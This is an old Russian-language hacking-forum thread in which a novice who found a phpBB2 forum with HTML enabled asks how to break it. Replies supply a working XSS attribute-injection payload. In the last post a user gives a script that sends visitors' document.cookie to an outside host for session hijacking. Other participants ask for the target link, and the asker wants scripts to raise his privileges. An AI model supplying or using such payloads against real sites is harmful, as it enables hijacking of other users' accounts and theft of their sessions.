HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ОФФТОП > Болталка
   
 
 
Опции темы Поиск в этой теме Опции просмотра

PHPbb2 нашел форму где html-тэг ON
  #1  
Старый 18.12.2006, 16:09
mr-troy
Новичок
Регистрация: 15.12.2006
Сообщений: 9
Провел на форуме:
226414

Репутация: 7
Smile PHPbb2 нашел форму где html-тэг ON

Вто нашел такой форум, где хтмл тэги включены, как можно сломать?
не бейте сильно, я только учусь

Последний раз редактировалось mr-troy; 18.12.2006 в 16:14.. Причина: опечатка
 

  #2  
Старый 18.12.2006, 17:04
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию

xss
Цитата:
<pre a='>' onmouseover='alert(/XSS/)' b='<pre' >
 

  #3  
Старый 18.12.2006, 17:08
mr-troy
Новичок
Регистрация: 15.12.2006
Сообщений: 9
Провел на форуме:
226414

Репутация: 7
По умолчанию

Цитата:
Сообщение от delay(0)  
xss
я одном топике ответил данным сообщением, вывелось вот это:
<pre>
а что дальше? можешь в аську стукнуть? или тут написать?
 

  #4  
Старый 18.12.2006, 19:01
EPIDEM
Banned
Регистрация: 28.12.2005
Сообщений: 221
Провел на форуме:
2540519

Репутация: 60
Отправить сообщение для EPIDEM с помощью ICQ
По умолчанию

дай сцылу =)
 

  #5  
Старый 18.12.2006, 20:10
mr-troy
Новичок
Регистрация: 15.12.2006
Сообщений: 9
Провел на форуме:
226414

Репутация: 7
По умолчанию

гы..я ломать ничего не хочу
просто хочу понять уязвимость.
 

  #6  
Старый 18.12.2006, 20:29
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию

эта уязвимость называется xss -- что расшифоровывается как крос сайт скриптингъъъ -- вообщем можно вставлять --- любой текст -- подумай сам если вставить javascript код -- то браузер его воспримет как код и выполнит --- =) лол
 

  #7  
Старый 18.12.2006, 21:38
mr-troy
Новичок
Регистрация: 15.12.2006
Сообщений: 9
Провел на форуме:
226414

Репутация: 7
По умолчанию

Цитата:
Сообщение от genom--  
эта уязвимость называется xss -- что расшифоровывается как крос сайт скриптингъъъ -- вообщем можно вставлять --- любой текст -- подумай сам если вставить javascript код -- то браузер его воспримет как код и выполнит --- =) лол
ОО спасибо, т.е вместо скрипта XSS могу любой яваскрипт вставить
а чтобы права расширить свои, какие скрипты посоветуете? )
 

  #8  
Старый 18.12.2006, 21:47
mr-troy
Новичок
Регистрация: 15.12.2006
Сообщений: 9
Провел на форуме:
226414

Репутация: 7
По умолчанию

<pre a='>' onmouseover='alert(/<script language="JavaScript">
WOweb=window.open("ВЗЛОМ/","mr-troy", "width=200, height=143, toolbar=0, location=0, status=0, menubar=0, scrollbars=0, resizable=0,left=1,top=1")
</script>)' b='<pre' >

Вот так работаеть будет? Типа всплывающее окно.
 

  #9  
Старый 19.12.2006, 13:08
EPIDEM
Banned
Регистрация: 28.12.2005
Сообщений: 221
Провел на форуме:
2540519

Репутация: 60
Отправить сообщение для EPIDEM с помощью ICQ
По умолчанию

дай фсетаки форум =)
ломать не буим но посмеёмся =))
 

  #10  
Старый 22.12.2006, 10:49
Kaban
Участник форума
Регистрация: 19.03.2006
Сообщений: 286
Провел на форуме:
2547059

Репутация: 144
По умолчанию

Цитата:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
читай статьи про XSS, там описано как что сделать...
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Кинь свой Анекдот TROJ@N Болталка 19 02.11.2009 03:53



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ